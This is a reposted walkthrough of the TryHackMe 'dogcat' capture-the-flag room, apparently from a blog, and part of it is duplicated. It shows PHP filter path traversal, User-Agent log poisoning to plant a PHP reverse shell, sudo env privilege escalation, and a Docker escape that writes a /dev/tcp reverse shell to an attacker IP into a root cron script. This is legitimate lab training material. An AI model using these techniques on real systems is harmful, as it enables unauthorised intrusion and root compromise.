03-06-2023, 04:41 AM
TryHackMe DogCat Walkthrough [+ Easy Video]
<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"1184671","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","starsonly":"","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</p></div>
<h2>CHALLENGE OVERVIEW</h2>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-dogcat-walkthrough-easy-video/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2F8MYrYIQR-9o%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<ul>
<li><strong>Link</strong>: <a href="https://tryhackme.com/room/dogcat" target="_blank" rel="noreferrer noopener">THM Dogcat</a></li>
<li><strong>Difficulty</strong>: Medium</li>
<li><strong>Target</strong>: Flags 1-4</li>
<li><strong>Highlight</strong>: intercepting and modifying a web request using <code>burpsuite </code></li>
<li><strong>Tools used</strong>: <code>base64</code>, <code>burpsuite</code></li>
<li><strong>Tags</strong>: <em>docker, directory traversal</em></li>
</ul>
<h2>BACKGROUND</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="693" height="459" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-45.png" alt="" class="wp-image-1184695" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-45.png 693w, https://blog.finxter.com/wp-content/uplo...00x199.png 300w" sizes="(max-width: 693px) 100vw, 693px" /></figure>
</div>
<p>In this tutorial, we will walk a simple website showing pictures of dogs and cats. </p>
<p>We’ll discover a directory traversal vulnerability that we can leverage to view sensitive files on the target machine. </p>
<p>At the end of this challenge, we will break out of a docker container in order to capture the 4th and final flag.</p>
<h2>ENUMERATION/RECON</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="608" height="855" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-51.png" alt="" class="wp-image-1184710" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-51.png 608w, https://blog.finxter.com/wp-content/uplo...13x300.png 213w" sizes="(max-width: 608px) 100vw, 608px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">export target=10.10.148.135
Export myIP=10.6.2.23
</pre>
<p>Let’s walk the site. </p>
<p>It looks like a simple image-viewing site that can randomize images of dogs and cats. After toying around with the browser addresses, we find that directory traversal allows us to view other files. </p>
<p>Let’s see if we can grab the HTML code that processes our parameters in the browser address. This will help us understand what is happening on the backend. </p>
<p>We’ll use a simple PHP filter to convert the contents to <a href="https://blog.finxter.com/python-base64/" data-type="post" data-id="327003" target="_blank" rel="noreferrer noopener">base64</a> and output the raw base64 string. </p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../index</pre>
<p>Raw output:</p>
<pre class="wp-block-preformatted"><code>PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg== </code></pre>
<p>Let’s save this string as a file named “<code>string</code>”. Then we can use the command “<code>cat string | base64 -d</code>” to decrypt this string and view it as raw HTML code.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="917" height="604" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-43.png" alt="" class="wp-image-1184687" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-43.png 917w, https://blog.finxter.com/wp-content/uplo...00x198.png 300w, https://blog.finxter.com/wp-content/uplo...68x506.png 768w" sizes="(max-width: 917px) 100vw, 917px" /></figure>
</div>
<p>Reading over this HTML code, we can see that the file extension can be set! </p>
<p>If the user doesn’t specify the extension, the default will be <code>.php</code>. This means that we can add “<code>&ext=</code>” to the end of our web address to avoid the <code>.php</code> extension from being added. </p>
<p>In order for it to properly display our request, we need to include the word “dog” or “cat” in the address.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="942" height="520" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-42.png" alt="" class="wp-image-1184685" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-42.png 942w, https://blog.finxter.com/wp-content/uplo...00x166.png 300w, https://blog.finxter.com/wp-content/uplo...68x424.png 768w" sizes="(max-width: 942px) 100vw, 942px" /></figure>
</div>
<p>Let’s dive in with <code>burpsuite</code> and start intercepting and modifying requests.</p>
<p>Here is our order of steps for us to get our initial foothold on the target machine:</p>
<ol>
<li>Create a PHP reverse shell</li>
<li>Start up our <code>netcat</code> listener</li>
<li>Use <code>burp</code> to intercept and modify the web request. Wait until later to click “<code>forward</code>”.</li>
<li>Spin up a <a rel="noreferrer noopener" href="https://blog.finxter.com/python-one-liner-webserver/" data-type="post" data-id="8635" target="_blank">simple HTTP server </a>with Python in the same directory as the PHP revshell.</li>
<li>Click “<code>forward</code>” on <code>burp</code> to send the web request.</li>
<li>Activate the shell by entering: <code>$targetIP/bshell.php</code> in the browser address</li>
<li>Catch the revshell on <code>netcat</code>!</li>
</ol>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="713" height="826" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-50.png" alt="" class="wp-image-1184709" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-50.png 713w, https://blog.finxter.com/wp-content/uplo...59x300.png 259w" sizes="(max-width: 713px) 100vw, 713px" /></figure>
</div>
<h3>STEP 1</h3>
<p>Let’s create a PHP pentest monkey revshell.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="978" height="628" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-41.png" alt="" class="wp-image-1184683" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-41.png 978w, https://blog.finxter.com/wp-content/uplo...00x193.png 300w, https://blog.finxter.com/wp-content/uplo...68x493.png 768w" sizes="(max-width: 978px) 100vw, 978px" /></figure>
</div>
<h3>STEP 2</h3>
<p>Let’s first start up a <code>netcat</code> listener on port 2222.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nc -lnvp 2222</pre>
<h3>STEP 3</h3>
<p>Intercept the web request for the Apache2 log and modify the User-Agent field with a PHP code to request the <code>shell.php</code> code and rename it <code>bshell.php</code> on the target machine. </p>
<p>This will work only because upon examining the Apache2 logs, we noticed that the User-Agent field is unencoded and vulnerable to command injection. Make sure to wait to click forward until step 5.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="942" height="520" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-40.png" alt="" class="wp-image-1184682" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-40.png 942w, https://blog.finxter.com/wp-content/uplo...00x166.png 300w, https://blog.finxter.com/wp-content/uplo...68x424.png 768w" sizes="(max-width: 942px) 100vw, 942px" /></figure>
</div>
<h3>STEP 4</h3>
<p>We’ll spin up a simple python HTTP server in the same directory as our revshell to serve <code>shell.php</code> to our target machine via the modified web request we created in <code>burpsuite</code>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="467" height="123" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-39.png" alt="" class="wp-image-1184681" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-39.png 467w, https://blog.finxter.com/wp-content/uplo...300x79.png 300w" sizes="(max-width: 467px) 100vw, 467px" /></figure>
</div>
<h3>STEP 5</h3>
<p>Click forward on burp and check to see if code 200 came through for <code>shell.php</code> on the HTTP server.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="465" height="271" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-38.png" alt="" class="wp-image-1184680" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-38.png 465w, https://blog.finxter.com/wp-content/uplo...00x175.png 300w" sizes="(max-width: 465px) 100vw, 465px" /></figure>
</div>
<h3>STEP 6</h3>
<p>We can activate the shell from our browser now and hopefully catch it as a revshell on our netcat listener.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="940" height="175" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-37.png" alt="" class="wp-image-1184679" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-37.png 940w, https://blog.finxter.com/wp-content/uplo...300x56.png 300w, https://blog.finxter.com/wp-content/uplo...68x143.png 768w" sizes="(max-width: 940px) 100vw, 940px" /></figure>
</div>
<h3>STEP 7</h3>
<p>We successfully caught it! Now we are in with our initial foothold!</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="458" height="202" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-36.png" alt="" class="wp-image-1184678" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-36.png 458w, https://blog.finxter.com/wp-content/uplo...00x132.png 300w" sizes="(max-width: 458px) 100vw, 458px" /></figure>
</div>
<h2>INITIAL FOOTHOLD</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="688" height="613" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-49.png" alt="" class="wp-image-1184708" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-49.png 688w, https://blog.finxter.com/wp-content/uplo...00x267.png 300w" sizes="(max-width: 688px) 100vw, 688px" /></figure>
</div>
<p>LOCATE THE FIRST FLAG</p>
<p>Let’s grab the first flag. We can grab it from our browser again in base64, or via the command line from the revshell.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../flag
PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=
</pre>
<p>Now we can decode this string (saved as <code>firstflag.txt</code>) with <code>base64</code>:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">base64 --decode firstflag.txt <?php
$flag_1 = "THM{Th—------------ommitted—-------fa}"
?>
</pre>
<h2>LOCAL RECON</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="689" height="854" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-48.png" alt="" class="wp-image-1184707" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-48.png 689w, https://blog.finxter.com/wp-content/uplo...42x300.png 242w" sizes="(max-width: 689px) 100vw, 689px" /></figure>
</div>
<h3>LOCATE THE SECOND FLAG</h3>
<p>We manually enumerate the filesystem and discover the second flag at <code>/var/www/flag2_QMW7JvaY2LvK.txt</code></p>
<p>Using the command find can help us quickly scan the filesystem for any files which contain the word “flag”.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">find / -type f -name '*flag*' 2>/dev/null</pre>
<p>We found the second flag in plaintext!</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cat flag2_QMW7JvaY2LvK.txt
THM{LF—------------ommitted—-------fb}
</pre>
<h3>CHECK SUDO PERMISSIONS</h3>
<p>Let’s check out our sudo permissions with the command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo -l
Matching Defaults entries for www-data on 26e23794a52b: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on 26e23794a52b: (root) NOPASSWD: /usr/bin/env
</pre>
<h2>EXPLOIT/PRIVILEGE ESCALATION</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="607" height="914" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-47.png" alt="" class="wp-image-1184705" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-47.png 607w, https://blog.finxter.com/wp-content/uplo...99x300.png 199w" sizes="(max-width: 607px) 100vw, 607px" /></figure>
</div>
<p>Because we have sudo permissions without a password to run the env bin, we can easily become root with the command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">$ sudo env /bin/bash</pre>
<p>Now we can verify that we are root with the command <code>whoami</code>.</p>
<h3>GRAB THE THIRD FLAG </h3>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cd /root
ls
flag3.txt
cat flag3.txt
THM{D1—------------ommitted—-------12}
</pre>
<h2>POST-EXPLOITATION – BREAK OUT OF THE DOCKER CONTAINER</h2>
<p>Let’s start up a new listener to catch the new bash shell outside of the container.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nc -lnvp 3333</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="627" height="259" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-35.png" alt="" class="wp-image-1184677" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-35.png 627w, https://blog.finxter.com/wp-content/uplo...00x124.png 300w" sizes="(max-width: 627px) 100vw, 627px" /></figure>
</div>
<p>We notice that there is a <code>backup.sh</code> that regularly runs on a schedule via cronjobs. We can hijack this file which is run by root outside of the docker container, by changing the contents to throw a revshell.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">echo "#!/bin/bash">backup.sh;echo "bash -i>/dev/tcp/10.6.2.23/3333 0>&1">>backup.sh
flag4.txt
cat flag4.txt
THM{esc—------------ommitted—-------2d}
</pre>
<h2>FINAL THOUGHTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="614" height="907" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-46.png" alt="" class="wp-image-1184704" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-46.png 614w, https://blog.finxter.com/wp-content/uplo...03x300.png 203w" sizes="(max-width: 614px) 100vw, 614px" /></figure>
</div>
<p>This box was a lot of fun. The bulk of the challenge was working towards gaining the initial foothold. </p>
<p>Once we secured a revshell, the rest of the box went pretty quickly. </p>
<p>The final step of breaking out of a docker container with a second revshell was the sneakiest part for me. </p>
<p>The PHP directory traversal and using a php filter to encode with base64 was also a cool way to evade the data sanitation measures in place on the backend. </p>
</div>
https://www.sickgaming.net/blog/2023/03/...asy-video/
<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"1184671","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","starsonly":"","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</p></div>
<h2>CHALLENGE OVERVIEW</h2>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-dogcat-walkthrough-easy-video/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2F8MYrYIQR-9o%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<ul>
<li><strong>Link</strong>: <a href="https://tryhackme.com/room/dogcat" target="_blank" rel="noreferrer noopener">THM Dogcat</a></li>
<li><strong>Difficulty</strong>: Medium</li>
<li><strong>Target</strong>: Flags 1-4</li>
<li><strong>Highlight</strong>: intercepting and modifying a web request using <code>burpsuite </code></li>
<li><strong>Tools used</strong>: <code>base64</code>, <code>burpsuite</code></li>
<li><strong>Tags</strong>: <em>docker, directory traversal</em></li>
</ul>
<h2>BACKGROUND</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="693" height="459" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-45.png" alt="" class="wp-image-1184695" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-45.png 693w, https://blog.finxter.com/wp-content/uplo...00x199.png 300w" sizes="(max-width: 693px) 100vw, 693px" /></figure>
</div>
<p>In this tutorial, we will walk a simple website showing pictures of dogs and cats. </p>
<p>We’ll discover a directory traversal vulnerability that we can leverage to view sensitive files on the target machine. </p>
<p>At the end of this challenge, we will break out of a docker container in order to capture the 4th and final flag.</p>
<h2>ENUMERATION/RECON</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="608" height="855" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-51.png" alt="" class="wp-image-1184710" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-51.png 608w, https://blog.finxter.com/wp-content/uplo...13x300.png 213w" sizes="(max-width: 608px) 100vw, 608px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">export target=10.10.148.135
Export myIP=10.6.2.23
</pre>
<p>Let’s walk the site. </p>
<p>It looks like a simple image-viewing site that can randomize images of dogs and cats. After toying around with the browser addresses, we find that directory traversal allows us to view other files. </p>
<p>Let’s see if we can grab the HTML code that processes our parameters in the browser address. This will help us understand what is happening on the backend. </p>
<p>We’ll use a simple PHP filter to convert the contents to <a href="https://blog.finxter.com/python-base64/" data-type="post" data-id="327003" target="_blank" rel="noreferrer noopener">base64</a> and output the raw base64 string. </p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../index</pre>
<p>Raw output:</p>
<pre class="wp-block-preformatted"><code>PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg== </code></pre>
<p>Let’s save this string as a file named “<code>string</code>”. Then we can use the command “<code>cat string | base64 -d</code>” to decrypt this string and view it as raw HTML code.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="917" height="604" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-43.png" alt="" class="wp-image-1184687" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-43.png 917w, https://blog.finxter.com/wp-content/uplo...00x198.png 300w, https://blog.finxter.com/wp-content/uplo...68x506.png 768w" sizes="(max-width: 917px) 100vw, 917px" /></figure>
</div>
<p>Reading over this HTML code, we can see that the file extension can be set! </p>
<p>If the user doesn’t specify the extension, the default will be <code>.php</code>. This means that we can add “<code>&ext=</code>” to the end of our web address to avoid the <code>.php</code> extension from being added. </p>
<p>In order for it to properly display our request, we need to include the word “dog” or “cat” in the address.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="942" height="520" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-42.png" alt="" class="wp-image-1184685" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-42.png 942w, https://blog.finxter.com/wp-content/uplo...00x166.png 300w, https://blog.finxter.com/wp-content/uplo...68x424.png 768w" sizes="(max-width: 942px) 100vw, 942px" /></figure>
</div>
<p>Let’s dive in with <code>burpsuite</code> and start intercepting and modifying requests.</p>
<p>Here is our order of steps for us to get our initial foothold on the target machine:</p>
<ol>
<li>Create a PHP reverse shell</li>
<li>Start up our <code>netcat</code> listener</li>
<li>Use <code>burp</code> to intercept and modify the web request. Wait until later to click “<code>forward</code>”.</li>
<li>Spin up a <a rel="noreferrer noopener" href="https://blog.finxter.com/python-one-liner-webserver/" data-type="post" data-id="8635" target="_blank">simple HTTP server </a>with Python in the same directory as the PHP revshell.</li>
<li>Click “<code>forward</code>” on <code>burp</code> to send the web request.</li>
<li>Activate the shell by entering: <code>$targetIP/bshell.php</code> in the browser address</li>
<li>Catch the revshell on <code>netcat</code>!</li>
</ol>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="713" height="826" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-50.png" alt="" class="wp-image-1184709" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-50.png 713w, https://blog.finxter.com/wp-content/uplo...59x300.png 259w" sizes="(max-width: 713px) 100vw, 713px" /></figure>
</div>
<h3>STEP 1</h3>
<p>Let’s create a PHP pentest monkey revshell.</p>
<div class="wp-block-image">
